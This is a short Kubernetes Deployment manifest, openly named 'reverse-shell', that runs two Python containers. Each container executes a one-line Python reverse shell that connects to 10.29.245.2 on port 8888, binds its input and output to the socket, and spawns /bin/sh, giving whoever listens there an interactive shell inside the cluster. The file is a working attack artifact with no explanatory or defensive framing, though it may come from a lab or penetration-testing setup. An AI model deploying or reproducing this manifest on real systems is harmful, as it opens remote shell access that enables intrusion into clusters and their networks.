apiVersion: apps/v1
kind: Deployment
metadata:
  name: reverse-shell
spec:
  selector:
    matchLabels:
      app: reverse-shell
  replicas: 2
  template:
    metadata:
      labels:
        app: reverse-shell
    spec:
      containers:
      - name: python
        image: python:buster
        imagePullPolicy: Always
        ports:
        - containerPort: 8888
        readinessProbe:
          tcpSocket:
            port: 8888
          initialDelaySeconds: 5
          periodSeconds: 10
        securityContext:
          allowPrivilegeEscalation: false
        stdin: true
        tty: true
        command: ['/usr/bin/python', '-c', 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.29.245.2",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")']
        resources:
          requests:
            memory: "64Mi"
            cpu: "250m"
          limits:
            memory: "128Mi"
            cpu: "500m"
     
